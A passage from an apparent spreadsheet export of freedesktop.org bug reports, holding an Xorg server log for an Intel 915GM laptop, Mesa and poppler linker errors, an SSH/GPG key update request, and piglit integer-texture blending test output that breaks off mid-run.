	[11] -1	0	0xd000a000 - 0xd000a0ff (0x100) MX[B]
	[12] -1	0	0xd0008000 - 0xd0009fff (0x2000) MX[B]
	[13] -1	0	0xd0004000 - 0xd0007fff (0x4000) MX[B]
	[14] -1	0	0xd0003000 - 0xd00037ff (0x800) MX[B]
	[15] -1	0	0xd0000000 - 0xd0000fff (0x1000) MX[B]
	[16] -1	0	0xd0582000 - 0xd05820ff (0x100) MX[B]
	[17] -1	0	0xd0581000 - 0xd05811ff (0x200) MX[B]
	[18] -1	0	0xd0580000 - 0xd05803ff (0x400) MX[B]
	[19] -1	0	0xd0500000 - 0xd057ffff (0x80000) MX[B](B)
	[20] -1	0	0xd0480000 - 0xd04bffff (0x40000) MX[B](B)
	[21] -1	0	0xc0000000 - 0xcfffffff (0x10000000) MX[B](B)
	[22] -1	0	0xd0400000 - 0xd047ffff (0x80000) MX[B](B)
	[23] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[24] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
	[25] -1	0	0x00001200 - 0x0000121f (0x20) IX[B]
	[26] -1	0	0x00002580 - 0x0000258f (0x10) IX[B]
	[27] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[28] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[29] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[30] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[31] -1	0	0x00002500 - 0x0000257f (0x80) IX[B]
	[32] -1	0	0x00002400 - 0x000024ff (0x100) IX[B]
	[33] -1	0	0x00002200 - 0x0000223f (0x40) IX[B]
	[34] -1	0	0x00002100 - 0x000021ff (0x100) IX[B]
	[35] -1	0	0x00002060 - 0x0000207f (0x20) IX[B]
	[36] -1	0	0x00002040 - 0x0000205f (0x20) IX[B]
	[37] -1	0	0x00002020 - 0x0000203f (0x20) IX[B]
	[38] -1	0	0x00002000 - 0x0000201f (0x20) IX[B]
	[39] -1	0	0x00007000 - 0x00007007 (0x8) IX[B](B)
(II) extmod will be loaded. This was enabled by default and also specified in the config file.
(II) dbe will be loaded. This was enabled by default and also specified in the config file.
(II) glx will be loaded. This was enabled by default and also specified in the config file.
(II) freetype will be loaded. This was enabled by default and also specified in the config file.
(II) record will be loaded by default.
(II) dri will be loaded. This was enabled by default and also specified in the config file.
(II) LoadModule: dbe
(II) Loading /usr/lib/xorg/modules/extensions//libdbe.so
(II) Module dbe: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension DOUBLE-BUFFER
(II) LoadModule: dri
(II) Loading /usr/lib/xorg/modules/extensions//libdri.so
(II) Module dri: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension XFree86-DRI
(II) LoadModule: glx
(II) Loading /usr/lib/xorg/modules/extensions//libglx.so
(II) Module glx: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	ABI class: X.Org Server Extension version 0.3
(==) AIGLX enabled
(II) Loading extension GLX
(II) LoadModule: freetype
(II) Loading /usr/lib/xorg/modules//fonts/libfreetype.so
(II) Module freetype: vendor=X.Org Foundation &amp; the After X-TT Project
	compiled for 1.4.0 module version = 2.1.0
	Module class: X.Org Font Renderer
	ABI class: X.Org Font Renderer version 0.5
(II) Loading font FreeType
(II) LoadModule: type1
(WW) Warning couldn't open module type1
(II) UnloadModule: type1
(EE) Failed to load module type1 (module does not exist 0)
(II) LoadModule: extmod
(II) Loading /usr/lib/xorg/modules/extensions//libextmod.so
(II) Module extmod: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension SHAPE
(II) Loading extension MIT-SUNDRY-NONSTANDARD
(II) Loading extension BIG-REQUESTS
(II) Loading extension SYNC
(II) Loading extension MIT-SCREEN-SAVER
(II) Loading extension XC-MISC
(II) Loading extension XFree86-VidModeExtension
(II) Loading extension XFree86-Misc
(II) Loading extension XFree86-DGA
(II) Loading extension DPMS
(II) Loading extension TOG-CUP
(II) Loading extension Extended-Visual-Information
(II) Loading extension XVideo
(II) Loading extension XVideo-MotionCompensation
(II) Loading extension X-Resource
(II) LoadModule: synaptics
(II) Loading /usr/lib/xorg/modules/input//synaptics_drv.so
(II) Module synaptics: vendor=X.Org Foundation
	compiled for 4.3.99.902 module version = 1.0.0
	Module class: X.Org XInput Driver
	ABI class: X.Org XInput driver version 2.0
(II) LoadModule: record
(II) Loading /usr/lib/xorg/modules/extensions//librecord.so
(II) Module record: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.13.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension RECORD
(II) LoadModule: intel
(II) Loading /usr/lib/xorg/modules/drivers//intel_drv.so
(II) Module intel: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 2.2.0
	Module class: X.Org Video Driver
	ABI class: X.Org Video Driver version 2.0
(II) LoadModule: synaptics
(II) Reloading /usr/lib/xorg/modules/input//synaptics_drv.so
(II) LoadModule: kbd
(II) Loading /usr/lib/xorg/modules/input//kbd_drv.so
(II) Module kbd: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.2.2
	Module class: X.Org XInput Driver
	ABI class: X.Org XInput driver version 2.0
(II) LoadModule: mouse
(II) Loading /usr/lib/xorg/modules/input//mouse_drv.so
(II) Module mouse: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.2.3
	Module class: X.Org XInput Driver
	ABI class: X.Org XInput driver version 2.0
(II) intel: Driver for Intel Integrated Graphics Chipsets: i810
	i810-dc100 i810e i815 i830M 845G 852GM/855GM 865G 915G
	E7221 (i915) 915GM 945G 945GM 945GME 965G 965G 965Q 946GZ
	965GM 965GME/GLE G33 Q35 Q33
(II) Primary Device is: PCI 00:02:0
(WW) intel: No matching Device section for instance (BusID PCI:0:2:1) found
(--) Chipset 915GM found
(II) resource ranges after xf86ClaimFixedResources() call:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0xd0020000 - 0xd002ffff (0x10000) MX[B]
	[5] -1	0	0xd0010000 - 0xd0010fff (0x1000) MX[B]
	[6] -1	0	0xd000f000 - 0xd000ffff (0x1000) MX[B]
	[7] -1	0	0xd000e000 - 0xd000efff (0x1000) MX[B]
	[8] -1	0	0xd000d000 - 0xd000dfff (0x1000) MX[B]
	[9] -1	0	0xd000c000 - 0xd000c0ff (0x100) MX[B]
	[10] -1	0	0xd000b000 - 0xd000b0ff (0x100) MX[B]
	[11] -1	0	0xd000a000 - 0xd000a0ff (0x100) MX[B]
	[12] -1	0	0xd0008000 - 0xd0009fff (0x2000) MX[B]
	[13] -1	0	0xd0004000 - 0xd0007fff (0x4000) MX[B]
	[14] -1	0	0xd0003000 - 0xd00037ff (0x800) MX[B]
	[15] -1	0	0xd0000000 - 0xd0000fff (0x1000) MX[B]
	[16] -1	0	0xd0582000 - 0xd05820ff (0x100) MX[B]
	[17] -1	0	0xd0581000 - 0xd05811ff (0x200) MX[B]
	[18] -1	0	0xd0580000 - 0xd05803ff (0x400) MX[B]
	[19] -1	0	0xd0500000 - 0xd057ffff (0x80000) MX[B](B)
	[20] -1	0	0xd0480000 - 0xd04bffff (0x40000) MX[B](B)
	[21] -1	0	0xc0000000 - 0xcfffffff (0x10000000) MX[B](B)
	[22] -1	0	0xd0400000 - 0xd047ffff (0x80000) MX[B](B)
	[23] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[24] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
	[25] -1	0	0x00001200 - 0x0000121f (0x20) IX[B]
	[26] -1	0	0x00002580 - 0x0000258f (0x10) IX[B]
	[27] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[28] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[29] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[30] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[31] -1	0	0x00002500 - 0x0000257f (0x80) IX[B]
	[32] -1	0	0x00002400 - 0x000024ff (0x100) IX[B]
	[33] -1	0	0x00002200 - 0x0000223f (0x40) IX[B]
	[34] -1	0	0x00002100 - 0x000021ff (0x100) IX[B]
	[35] -1	0	0x00002060 - 0x0000207f (0x20) IX[B]
	[36] -1	0	0x00002040 - 0x0000205f (0x20) IX[B]
	[37] -1	0	0x00002020 - 0x0000203f (0x20) IX[B]
	[38] -1	0	0x00002000 - 0x0000201f (0x20) IX[B]
	[39] -1	0	0x00007000 - 0x00007007 (0x8) IX[B](B)
(II) resource ranges after probing:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0xd0020000 - 0xd002ffff (0x10000) MX[B]
	[5] -1	0	0xd0010000 - 0xd0010fff (0x1000) MX[B]
	[6] -1	0	0xd000f000 - 0xd000ffff (0x1000) MX[B]
	[7] -1	0	0xd000e000 - 0xd000efff (0x1000) MX[B]
	[8] -1	0	0xd000d000 - 0xd000dfff (0x1000) MX[B]
	[9] -1	0	0xd000c000 - 0xd000c0ff (0x100) MX[B]
	[10] -1	0	0xd000b000 - 0xd000b0ff (0x100) MX[B]
	[11] -1	0	0xd000a000 - 0xd000a0ff (0x100) MX[B]
	[12] -1	0	0xd0008000 - 0xd0009fff (0x2000) MX[B]
	[13] -1	0	0xd0004000 - 0xd0007fff (0x4000) MX[B]
	[14] -1	0	0xd0003000 - 0xd00037ff (0x800) MX[B]
	[15] -1	0	0xd0000000 - 0xd0000fff (0x1000) MX[B]
	[16] -1	0	0xd0582000 - 0xd05820ff (0x100) MX[B]
	[17] -1	0	0xd0581000 - 0xd05811ff (0x200) MX[B]
	[18] -1	0	0xd0580000 - 0xd05803ff (0x400) MX[B]
	[19] -1	0	0xd0500000 - 0xd057ffff (0x80000) MX[B](B)
	[20] -1	0	0xd0480000 - 0xd04bffff (0x40000) MX[B](B)
	[21] -1	0	0xc0000000 - 0xcfffffff (0x10000000) MX[B](B)
	[22] -1	0	0xd0400000 - 0xd047ffff (0x80000) MX[B](B)
	[23] 0	0	0x000a0000 - 0x000affff (0x10000) MS[B]
	[24] 0	0	0x000b0000 - 0x000b7fff (0x8000) MS[B]
	[25] 0	0	0x000b8000 - 0x000bffff (0x8000) MS[B]
	[26] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[27] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
	[28] -1	0	0x00001200 - 0x0000121f (0x20) IX[B]
	[29] -1	0	0x00002580 - 0x0000258f (0x10) IX[B]
	[30] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[31] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[32] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[33] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[34] -1	0	0x00002500 - 0x0000257f (0x80) IX[B]
	[35] -1	0	0x00002400 - 0x000024ff (0x100) IX[B]
	[36] -1	0	0x00002200 - 0x0000223f (0x40) IX[B]
	[37] -1	0	0x00002100 - 0x000021ff (0x100) IX[B]
	[38] -1	0	0x00002060 - 0x0000207f (0x20) IX[B]
	[39] -1	0	0x00002040 - 0x0000205f (0x20) IX[B]
	[40] -1	0	0x00002020 - 0x0000203f (0x20) IX[B]
	[41] -1	0	0x00002000 - 0x0000201f (0x20) IX[B]
	[42] -1	0	0x00007000 - 0x00007007 (0x8) IX[B](B)
	[43] 0	0	0x000003b0 - 0x000003bb (0xc) IS[B]
	[44] 0	0	0x000003c0 - 0x000003df (0x20) IS[B]
(II) Setting vga for screen 0.
(II) Loading sub module int10
(II) LoadModule: int10
(II) Loading /usr/lib/xorg/modules//libint10.so
(II) Module int10: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	ABI class: X.Org Video Driver version 2.0
(II) Loading sub module vbe
(II) LoadModule: vbe
(II) Loading /usr/lib/xorg/modules//libvbe.so
(II) Module vbe: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.1.0
	ABI class: X.Org Video Driver version 2.0
(II) Loading sub module vgahw
(II) LoadModule: vgahw
(II) Loading /usr/lib/xorg/modules//libvgahw.so
(II) Module vgahw: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 0.1.0
	ABI class: X.Org Video Driver version 2.0
(**) intel(0): Depth 16 (--) framebuffer bpp 16
(==) intel(0): RGB weight 565
(==) intel(0): Default visual is TrueColor
(**) intel(0): Option AccelMethod EXA
(II) intel(0): Integrated Graphics Chipset: Intel(R) 915GM
(--) intel(0): Chipset: 915GM
(--) intel(0): Linear framebuffer at 0xC0000000
(--) intel(0): IO registers at addr 0xD0400000
(II) intel(0): 2 display pipes available.
(**) intel(0): Using EXA for acceleration
(II) Loading sub module ddc
(II) LoadModule: ddc(II) Module ddc already built-in
(II) Loading sub module i2c
(II) LoadModule: i2c(II) Module i2c already built-in
(II) intel(0): Output VGA using monitor section LCD
(II) intel(0): I2C bus CRTDDC_A initialized.
(II) intel(0): Output LVDS has no monitor section
(II) intel(0): I2C bus LVDSDDC_C initialized.
(II) intel(0): I2C device LVDSDDC_C:ddc2 registered at address 0xA0.
(II) intel(0): EDID vendor LGP prod id 1623
(II) Loading sub module int10
(II) LoadModule: int10
(II) Reloading /usr/lib/xorg/modules//libint10.so
(II) intel(0): initializing int10
(WW) intel(0): Bad V_BIOS checksum
(II) intel(0): Primary V_BIOS segment is: 0xc000
(II) intel(0): VESA BIOS detected
(II) intel(0): VESA VBE Version 3.0
(II) intel(0): VESA VBE Total Mem: 7872 kB
(II) intel(0): VESA VBE OEM: Intel(r)915GM/910ML/915MS Graphics Chip Accelerated VGA BIOS
(II) intel(0): VESA VBE OEM Software Rev: 1.0
(II) intel(0): VESA VBE OEM Vendor: Intel Corporation
(II) intel(0): VESA VBE OEM Product: Intel(r)915GM/910ML/915MS Graphics Controller
(II) intel(0): VESA VBE OEM Product Rev: Hardware Version 0.0
(II) intel(0): I2C bus SDVOCTRL_E for SDVOB initialized.
(II) intel(0): I2C device SDVOCTRL_E for SDVOB:SDVO Controller B registered at address 0x70.
(II) intel(0): No SDVO device found on SDVOB
(II) intel(0): I2C device SDVOCTRL_E for SDVOB:SDVO Controller B removed.
(II) intel(0): I2C bus SDVOCTRL_E for SDVOB removed.
(II) intel(0): I2C bus SDVOCTRL_E for SDVOC initialized.
(II) intel(0): I2C device SDVOCTRL_E for SDVOC:SDVO Controller C registered at address 0x72.
(II) intel(0): No SDVO device found on SDVOC
(II) intel(0): I2C device SDVOCTRL_E for SDVOC:SDVO Controller C removed.
(II) intel(0): I2C bus SDVOCTRL_E for SDVOC removed.
(II) intel(0): Output TV using monitor section TV
(II) intel(0): EDID vendor LGP prod id 1623
(II) intel(0): Output VGA disconnected
(II) intel(0): Output LVDS connected
(II) intel(0): Output TV disconnected
(II) intel(0): Output LVDS using initial mode 1024x768
(II) intel(0): Monitoring connected displays enabled
(II) intel(0): detected 256 kB GTT.
(II) intel(0): detected 7932 kB stolen memory.
(==) intel(0): video overlay key set to 0x83e
(==) intel(0): Will not try to enable page flipping
(==) intel(0): Triple buffering disabled
(==) intel(0): Using gamma correction (1.0 1.0 1.0)
(**) intel(0): Display dimensions: (304 228) mm
(**) intel(0): DPI set to (85 114)
(II) Loading sub module fb
(II) LoadModule: fb
(II) Loading /usr/lib/xorg/modules//libfb.so
(II) Module fb: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	ABI class: X.Org ANSI C Emulation version 0.3
(II) Loading sub module exa
(II) LoadModule: exa
(II) Loading /usr/lib/xorg/modules//libexa.so
(II) Module exa: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 2.2.0
	ABI class: X.Org Video Driver version 2.0
(II) Loading sub module ramdac
(II) LoadModule: ramdac(II) Module ramdac already built-in
(II) intel(0): Comparing regs from server start up to After PreInit
(WW) intel(0): Register 0x61200 (PP_STATUS) changed from 0xc0000008 to 0xd000000a
(WW) intel(0): PP_STATUS before: on ready sequencing idle
(WW) intel(0): PP_STATUS after: on ready sequencing on
(WW) intel(0): Register 0x68080 (TV_FILTER_CTL_1) changed from 0x8000085e to 0x800010bb
(WW) intel(0): Register 0x68084 (TV_FILTER_CTL_2) changed from 0x00012d2d to 0x00028283
(WW) intel(0): Register 0x68088 (TV_FILTER_CTL_3) changed from 0x00009696 to 0x00014141
(II) do I need RAC?  No I don't.
(II) resource ranges after preInit:
	[0] 0	0	0xd0480000 - 0xd04bffff (0x40000) MS[B]
	[1] 0	0	0xc0000000 - 0xcfffffff (0x10000000) MS[B]
	[2] 0	0	0xd0400000 - 0xd047ffff (0x80000) MS[B]
	[3] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[4] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[5] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[6] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[7] -1	0	0xd0020000 - 0xd002ffff (0x10000) MX[B]
	[8] -1	0	0xd0010000 - 0xd0010fff (0x1000) MX[B]
	[9] -1	0	0xd000f000 - 0xd000ffff (0x1000) MX[B]
	[10] -1	0	0xd000e000 - 0xd000efff (0x1000) MX[B]
	[11] -1	0	0xd000d000 - 0xd000dfff (0x1000) MX[B]
	[12] -1	0	0xd000c000 - 0xd000c0ff (0x100) MX[B]
	[13] -1	0	0xd000b000 - 0xd000b0ff (0x100) MX[B]
	[14] -1	0	0xd000a000 - 0xd000a0ff (0x100) MX[B]
	[15] -1	0	0xd0008000 - 0xd0009fff (0x2000) MX[B]
	[16] -1	0	0xd0004000 - 0xd0007fff (0x4000) MX[B]
	[17] -1	0	0xd0003000 - 0xd00037ff (0x800) MX[B]
	[18] -1	0	0xd0000000 - 0xd0000fff (0x1000) MX[B]
	[19] -1	0	0xd0582000 - 0xd05820ff (0x100) MX[B]
	[20] -1	0	0xd0581000 - 0xd05811ff (0x200) MX[B]
	[21] -1	0	0xd0580000 - 0xd05803ff (0x400) MX[B]
	[22] -1	0	0xd0500000 - 0xd057ffff (0x80000) MX[B](B)
	[23] -1	0	0xd0480000 - 0xd04bffff (0x40000) MX[B](B)
	[24] -1	0	0xc0000000 - 0xcfffffff (0x10000000) MX[B](B)
	[25] -1	0	0xd0400000 - 0xd047ffff (0x80000) MX[B](B)
	[26] 0	0	0x000a0000 - 0x000affff (0x10000) MS[B](OprD)
	[27] 0	0	0x000b0000 - 0x000b7fff (0x8000) MS[B](OprD)
	[28] 0	0	0x000b8000 - 0x000bffff (0x8000) MS[B](OprD)
	[29] 0	0	0x00007000 - 0x00007007 (0x8) IS[B]
	[30] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[31] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
	[32] -1	0	0x00001200 - 0x0000121f (0x20) IX[B]
	[33] -1	0	0x00002580 - 0x0000258f (0x10) IX[B]
	[34] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[35] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[36] -1	0	0x000001f0 - 0x000001f0 (0x1) IX[B]
	[37] -1	0	0x000001f0 - 0x000001f7 (0x8) IX[B]
	[38] -1	0	0x00002500 - 0x0000257f (0x80) IX[B]
	[39] -1	0	0x00002400 - 0x000024ff (0x100) IX[B]
	[40] -1	0	0x00002200 - 0x0000223f (0x40) IX[B]
	[41] -1	0	0x00002100 - 0x000021ff (0x100) IX[B]
	[42] -1	0	0x00002060 - 0x0000207f (0x20) IX[B]
	[43] -1	0	0x00002040 - 0x0000205f (0x20) IX[B]
	[44] -1	0	0x00002020 - 0x0000203f (0x20) IX[B]
	[45] -1	0	0x00002000 - 0x0000201f (0x20) IX[B]
	[46] -1	0	0x00007000 - 0x00007007 (0x8) IX[B](B)
	[47] 0	0	0x000003b0 - 0x000003bb (0xc) IS[B](OprU)
	[48] 0	0	0x000003c0 - 0x000003df (0x20) IS[B](OprU)
(II) intel(0): Kernel reported 238848 total 11265 used
(II) intel(0): I830CheckAvailableMemory: 910332 kB available
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 9 (OK)
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 9 (OK)
drmOpenByBusid: Searching for BusID pci:0000:00:02.0
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 9 (OK)
drmOpenByBusid: drmOpenMinor returns 9
drmOpenByBusid: drmGetBusid reports pci:0000:00:02.0
(II) [drm] DRM interface version 1.0
(EE) [drm] Could not set DRM device bus ID.
(EE) intel(0): [dri] DRIScreenInit failed. Disabling DRI.
(==) intel(0): VideoRam: 262144 KB
(**) intel(0): Framebuffer compression enabled
(**) intel(0): Tiling enabled
(II) intel(0): adjusting plane-&gt;pipe mappings to allow for framebuffer compression
(II) intel(0): Page Flipping disabled
(==) intel(0): Write-combining range (0xc00000000x10000000)
(II) intel(0): vgaHWGetIOBase: hwp-&gt;IOBase is 0x03d0 hwp-&gt;PIOOffset is 0x0000
(II) EXA(0): Offscreen pixmap area of 6291456 bytes
(II) EXA(0): Driver registered support for the following operations:
(II)         Solid
(II)         Copy
(II)         Composite (RENDER acceleration)
(==) intel(0): Backing store disabled
(==) intel(0): Silken mouse enabled
(II) intel(0): Initializing HW Cursor
(II) intel(0): xf86BindGARTMemory: bind key 5 at 0x00800000 (pgoffset 2048)
(II) intel(0): xf86BindGARTMemory: bind key 6 at 0x00a00000 (pgoffset 2560)
(II) intel(0): Fixed memory allocation layout:
(II) intel(0): 0x00000000-0x0001ffff: ring buffer (128 kB)
(II) intel(0): 0x00020000-0x0061ffff: compressed frame buffer (6144 kB 0x000000003f820000 physical
)
(II) intel(0): 0x00620000-0x00620fff: compressed ll buffer (4 kB 0x000000003fe20000 physical
)
(II) intel(0): 0x00621000-0x0062afff: HW cursors (40 kB 0x000000003fe21000 physical
)
(II) intel(0): 0x0062b000-0x00632fff: logical 3D context (32 kB)
(II) intel(0): 0x00633000-0x00633fff: overlay registers (4 kB 0x000000003fe33000 physical
)
(II) intel(0): 0x007bf000:            end of stolen memory
(II) intel(0): 0x00800000-0x009fffff: front buffer (2048 kB) X tiled
(II) intel(0): 0x00a00000-0x00ffffff: exa offscreen (6144 kB)
(II) intel(0): 0x10000000:            end of aperture
(II) intel(0): fbc disabled on plane a
(II) intel(0): fbc disabled on plane a
(II) intel(0): fbc disabled on plane a
(II) intel(0): fbc enabled on plane a
(WW) intel(0): fbc already enabled on plane a not enabling on plane a
(II) intel(0): Output configuration:
(II) intel(0):   Pipe A is off
(II) intel(0):   Display plane B is now disabled and connected to pipe A.
(II) intel(0):   Pipe B is on
(II) intel(0):   Display plane A is now enabled and connected to pipe B.
(II) intel(0):   Output VGA is connected to pipe none
(II) intel(0):   Output LVDS is connected to pipe B
(II) intel(0):   Output TV is connected to pipe none
(**) Option dpms
(**) intel(0): DPMS enabled
(II) intel(0): Set up textured video
(II) intel(0): Set up overlay video
(II) intel(0): direct rendering: Failed
(II) intel(0): RandR 1.2 enabled ignore the following RandR disabled message.</t>
  </si>
  <si>
    <t>zukuugho</t>
  </si>
  <si>
    <t>MESA-104141</t>
  </si>
  <si>
    <t>include/c11/threads_posix.h:96: undefined reference to `pthread_once'</t>
  </si>
  <si>
    <t>mesa: 8761a04d0d9332d9c0c99164faf855fc3c741f7c (master 17.4.0-devel)
meson build error
FAILED: src/gallium/targets/xvmc/libXvMCgallium.so 
c++  -o src/gallium/targets/xvmc/libXvMCgallium.so 'src/gallium/targets/xvmc/XvMCgallium@sha/target.c.o' -Wl--no-undefined -Wl--as-needed -shared -fPIC -Wl--start-group -Wl-sonamelibXvMCgallium.so src/gallium/state_trackers/xvmc/libxvmc_st.a src/gallium/auxiliary/libgalliumvlwinsys.a src/gallium/auxiliary/libgalliumvl.a src/gallium/auxiliary/libgallium.a src/util/libmesa_util.a src/gallium/auxiliary/pipe-loader/libpipe_loader_static.a src/loader/libloader.a src/util/libxmlconfig.a src/gallium/winsys/sw/null/libws_null.a src/gallium/winsys/sw/wrapper/libwsw.a src/gallium/drivers/r600/libr600.a src/gallium/winsys/radeon/drm/libradeonwinsys.a src/gallium/winsys/nouveau/drm/libnouveauwinsys.a src/gallium/drivers/nouveau/libnouveau.a -Wl--version-script mesa/src/gallium/targets/xvmc/xvmc.sym -Wl--gc-sections -lxcb -lX11-xcb -lX11 -lxcb -lxcb-dri2 -lxcb-dri3 -ldrm -lX11-xcb -lX11 -lxcb -lxcb -lxcb-dri2 -lxcb-dri3 -ldrm -ldrm -L/usr/lib64 -lLLVM-5.0 -lunwind -ldl -lm -lz -ldrm -ldrm -lexpat -lm -ldrm_radeon -lelf -L/usr/lib64 -lLLVM-5.0 -ldrm_radeon -ldrm_nouveau -Wl--end-group -ldrm -ldrm_nouveau '-Wl-rpath$ORIGIN/' -Wl-rpath-linkmesa/builddir/src/gallium/targets/xvmc  
src/gallium/auxiliary/libgallium.a(gallivm_lp_bld_misc.cpp.o): In function `lp_set_target_options':
include/c11/threads_posix.h:96: undefined reference to `pthread_once'</t>
  </si>
  <si>
    <t>POPPLER-21520</t>
  </si>
  <si>
    <t>utils/pdftoabw fails to compile due to missing libxml2 libs</t>
  </si>
  <si>
    <t>Created attachment 25366
linking fix
libtool: link: powerpc-apple-darwin8-g++ -Wall -Wno-write-strings -O3 -pipe -mcpu=G5 -mtune=G5 -Wl-dead_strip_dylibs -o pdftoabw pdftoabw.o parseargs.o -Wl-bind_at_load  -lpoppler -L/Library/Gentoo/usr/lib /Library/Gentoo/usr/lib/libfontconfig.dylib /Library/Gentoo/usr/lib/libiconv.dylib /Library/Gentoo/usr/lib/libfreetype.dylib /Library/Gentoo/usr/lib/libexpat.dylib -lopenjpeg -lz
Undefined symbols:
  _xmlSaveFormatFileEnc referenced from:
      _main in pdftoabw.o
  _xmlFreeDoc referenced from:
      _main in pdftoabw.o
  _xmlNewDoc referenced from:
      _main in pdftoabw.o
ld: symbol(s) not found
collect2: ld returned 1 exit status
make: *** [pdftoabw] Error 1
Attached patch is a possible way to solve it.  Most important is to include $(ABIWORD_LIBS) as set by configure in LDADD somehow such that libxml2 libs are passed onto the linker.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-69215</t>
  </si>
  <si>
    <t>SSH and GPG key changes</t>
  </si>
  <si>
    <t>Created attachment 85613
ssh public keys for machines I will be accessing from
Resetting all my ssh keys and now have a (proper) gpg key.</t>
  </si>
  <si>
    <t>bilboed</t>
  </si>
  <si>
    <t>PIGLIT-45351</t>
  </si>
  <si>
    <t>SIGABRT tests/spec/ext_texture_integer/fbo-blending.c:224</t>
  </si>
  <si>
    <t>piglit: 360050e3a311e9fd6eec029ff6b4480795c8f272 (master)
Run piglit spec/EXT_texture_integer/fbo-blending on Mesa softpipe.
$ ./bin/ext_texture_integer-fbo-blending
GL_RGBA8I:
Probe at (00)
  Expected: 5 4 3 2
  Observed: 72 114 4294967240 4294967268
  Input color: 5 4 3 2
GL_RGBA8UI:
Probe at (00)
  Expected: 5 4 3 2
  Observed: 16 163 86 2
  Input color: 5 4 3 2
GL_RGBA16I:
Probe at (00)
  Expected: 5 4 3 2
  Observed: 4294943504 598 0 0
  Input color: 5 4 3 2
GL_RGBA16UI:
Probe at (00)
  Expected: 5 4 3 2
  Observed: 41744 598 0 0
  Input color: 5 4 3 2
GL_RGBA32I:
Probe at (00)
  Expected: 5 4 3 2
  Observed: 39232272 0 0 0
  Input color: 5 4 3 2
GL_RGBA32UI:
Probe at (00)
  Expected: 5 4 3 2
  Observed: 39232272 0 0 0
  Input color: 5 4 3 2
GL_RGBA8I (bgra):
Probe at (00)
  Expected: 5 4 3 2
  Observed: 16 4294967203 86 2
  Input color: 5 4 3 2
GL_RGBA8UI (bgra):
Probe at (00)
  Expected: 5 4 3 2
  Observed: 16 163 86 2
  Input color: 5 4 3 2
GL_RGBA16I (bgra):
Probe at (00)
  Expected: 5 4 3 2
  Observed: 4294943504 598 0 0
  Input color: 5 4 3 2
GL_RGBA16UI (bgra):
Probe at (00)
  Expected: 5 4 3 2
  Observed: 41744 598 0 0
  Input color: 5 4 3 2
GL_RGBA32I (bgra):
Probe at (00)
  Expected: 5 4 3 2
  Observed: 39232272 0 0 0
  Input color: 5 4 3 2
GL_RGBA32UI (bgra):
Probe at (00)
  Expected: 5 4 3 2
  Observed: 39232272 0 0 0
  Input color: 5 4 3 2
GL_RGB8I:
Probe at (00)
  Expected: 5 4 3 1
  Observed: 16 4294967203 86 1
  Input color: 5 4 3 2
GL_RGB8UI:
Probe at (00)
  Expected: 5 4 3 1
  Observed: 16 163 86 1
  Input color: 5 4 3 2
GL_RGB16I:
Probe at (00)
  Expected: 5 4 3 1
  Observed: 4294943504 598 0 1
  Input color: 5 4 3 2
GL_RGB16UI:
Probe at (00)
  Expected: 5 4 3 1
  Observed: 41744 598 0 1
  Input color: 5 4 3 2
GL_RGB32I:
Probe at (00)
  Expected: 5 4 3 1
  Observed: 39232272 0 0 1
  Input color: 5 4 3 2
GL_RGB32UI:
